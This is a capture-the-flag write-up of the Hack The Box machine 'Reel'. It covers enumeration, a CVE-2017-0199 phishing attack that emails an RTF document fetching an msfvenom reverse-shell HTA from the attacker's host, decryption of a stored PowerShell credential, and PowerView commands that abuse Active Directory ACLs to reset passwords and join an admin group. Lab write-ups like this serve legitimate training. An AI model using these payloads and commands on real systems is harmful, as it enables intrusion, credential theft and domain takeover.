# REEL | 10.10.10.77

## Initial Enumeration

    sudo nmap -v -T4 -sV -sC -oN nmap-initial 10.10.10.77
    
### Open Ports and Services

* 21 - ftp - Microsoft ftpd
* 22 - SSH - OpenSSH 7.6
* 25 - smtp?
* 135 - MSRPC
* 139/445 - SMB
* 593 - ncacn_http
* 49159 - MSRPC

## Services Enumeration

### 21 - FTP

This server allows anonymous access, and there are 3 files inside a folder named 'documents':

![](img/ftp-enum.png)

I am not able to write to the server though.

The documents are one text file, and two .docx files, which are a pain to read in linux. I converted them to txt, and there was a bunch of stuff in one of them about configuring Windows Event Forwarder, but nothing to go on. The readme indicated that I should find an email somewhere, and that corresponds with the fact that port 25 is open, but I could not see one.

Checking the metadata with exiftool (and let me tell you, getting this tool on Arch was something else - just download it from the website instead) actually does give me an email: nico@megabank.com. Full disclosure I had to google what to do with this stuff for this box, just for the metadata thing. At least I have the knowhow for the next time I get files that appear to be a dead end.

Time to move on to the next service.

### 25 - SMTP

I can use 'smtp-user-enum' to enumerate users on the email server, or really just to confirm that 'nico@megabank.com' is valid.

    smtp-user-enum -M RCPT -U userlist -D megabank.com -t htb.local
    
![](img/megabank.png)

Additionally, there is a manual way, if you're just checking one;

![](img/smtpenum.png)

So, all we have right now is an email address and a note that we should send them rtf files. I guess that means a phishing attack. But let's continue with the enumeration on the other ports first.

### 135 - RPC

I can get a null session on here but I cannot execute any queries in that null session.

### 139/445 - SMB

Anonymous login is successful, but there is no workgroup so there is nothing to connect to.

## Foothold via Microsoft Office RCE phishing attack

I have never done this type of attack, so I am cribbing from other writeups. It is good to learn these types of attacks, even though they can involve user interaction. I'm excited to see how it works in this case, given that there are no other real users involved.

[This](https://github.com/bhdresh/CVE-2017-0199) github repo has a good toolkit for developing the exploit.

**Step 1**: generate msf payload.

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=6969 -f hta-psh -o sneaky.hta
    
**Step 2**: generate RTF file using the toolkit:

    python2 cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.20:8000/sneaky.hta -t rtf -x 0
    
**Step 3**: send email with malicious file. I will use sendemail for this:

    sendEmail -f gibson@megabank.com -t nico@megabank.com -u "Please see attached invoice" -m "Pay me NOW" -a invoice.rtf -s 10.10.10.77
    
But before hitting ENTER on that command, I need to have a server ready to grab the malicious file, and a netcat listener running. After that, I'm good to send the email and cross my fingers...

![user shell](img/user-shell.png)

I had to send it twice for some reason, but I do have a shell. That's neat! I guess the box has some way to automatically open the email/attachment, because obvi there is no real person there to click on the email.

### Flag

![user flag](img/user-flag.png)

## User Enumeration/privesc

This is a Windows Server 2012 R2, Domain Controller, with several hotfixes installed.

There are many other users on the system as well, so I could have my work cut out for me.

In nico's desktop folder (where the flag is) there is a 'cred.xml' file in which there appear to be credentials for the user tom.

Once again I am out of my depth - my lack of knowledge of powershell prevented me from figuring this one out on my own. I tried a couple of techniques I found by googling but ended up ruining my shell and I had to resend the email. Finally I found a way that worked from another writeup:

    powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
    
This gave me the plaintext password: 1ts-magic!!!

![](img/tom-pass.png)

OK. So SSH is running, so let's try that way:

![tom shell](img/tom-shell.png)

Nice. Let's see what Tom has going on. In his desktop folder there is a folder with Active Directory Enumeration tools - SharpHound and PowerView. He was doing an AD audit, and the note states there is no direct path from users to Domain Admin. But that doesn't mean there is no room to move laterally.

![note](img/note.png)

I tired to use the SharpHound tools in his directory, but they are for an older version of BloodHound and the results will not be parsed by my BloodHound version, so instead I attached to my SMB share which had the newer SharpHound and ran that myself. Then I uploaded the results to BloodHound and had a look around.

### BloodHound

When I first had to use this tool, I thought it was a bit much, but if you really dig into it it is very useful. I can imagine it must get real messy when you are attacking an entire network, because here with just one machine there are so many lines spidering out all over.

But Tom is right - there is no direct path to Domain Admin from either tom or nico.

But Tom apparently has control over the claire user for some reason:

![tom-claire](img/tom-claire.png)

With that control, tom can change many things including the password of claire. And digging deeper, I see that claire has "WriteDacl" and "GenericWrite" permissions over the 'backup_admins' group, the name of which stands out for obvious reasons. With the WriteDacl permission, claire can grant herself any privilege she wants over that group, including adding herself as a member.

![tom-claire-backup](img/tom-claire-backup.png)

That is where it ends however; even if I could get that far, from that point there is still no path to Domain Admins. But it's a start.

So to recap:

I can change claire's password, and then log in as her user via SSH. From there I can then add her user to the "Backup_Admins" group. Then I can poke around and see if there is another way to escalate my privileges further.

### PowerView

I am not sure if it is possible to do much without using PowerView, which is part of the PowerSploit suite. With it I am able to make changes to many things on the system, all within the parameters of what privileges my user has.

So I return to my SMB share, where I have PowerView waiting, so I can load the module.

**Step One: Grant Tom ownership of claire account**:

    Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
    
**Step Two: give tom permission to change claire's password**:

    Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
    
**Step Three: set a new password for claire**:

    $pass = ConvertTo-SecureString '420giBSon69' -AsPlainText -Force
    Set-DomainUserPassword -Identity claire -AccountPassword $pass
    
OK, now I should be able to login via SSH as claire:

![claire shell](img/claire-shell.png)

## Claire > Administrator

We're not done. Now I have to use claire's permissions to add herself to the Backup_admins group.

**Step One: grant claire the WriteMember privilege**:

    Add-DomainObjectAcl -TargetIdentity "Backup_Admins" -PrincipalIdentity claire -Rights WriteMembers -Verbose
    
**Step two: add claire to the group**:

    Add-DomainGroupMember -Identity "Backup_Admins" -Members claire -Verbose
    
Then I should just confirm that I am indeed in that group now:

![backup admins](img/backup-admins.png)

OK, let's look around. Actually let's not, because using PowerView to add her to the group appeared to work, but actually did not. So I fell back to using the basic way:

    net group backup_admins claire /add
    
That actually stuck.

With the new privileges from being in the backup_admins group, I can actually navigate to and look at the files in the Administrator folder:

![admin](img/admin-desktop.png)

However I can't read the flag:

![denied](img/denied.png)

Let's check out the Backup Scripts folder:

![backup scripts folder](img/backup-scripts.png)

This is a plausible reason why I can access the Administrator directory. Searching for the string 'pass' gives useful information:

![admin pass](img/admin-pass.png)

Let's log in as the admin via SSH:

![admin shell & flag](img/admin-shell-flag.png)

There we go.

## Conclusion

This box was unique for me. It was by turns frustrating and fascinating. And it had an interesting mix of Active Directory vs regular enum/privesc. The phishing attack was totally new to me and I am happy to have learned something new, even if that particular exploit is of limited use by now. And the AD enumeration with BloodHound was fun - it seemed daunting at first, but then things fell into place and I was able to figure out the path on my own.

Steps taken:

* Discover email address in document metadata
* Create malicious document with reverse shell and email it to address, get low-priv shell
* Escalate to higher-priv user via cred.xml password extraction
* Use PowerView to change AD settings to gain control of another account, moving laterally
* Take advantage of user's permissions to add it to a new group
* New group's permissions allowed viewing of Admin folder
* Extract admin password from backup script
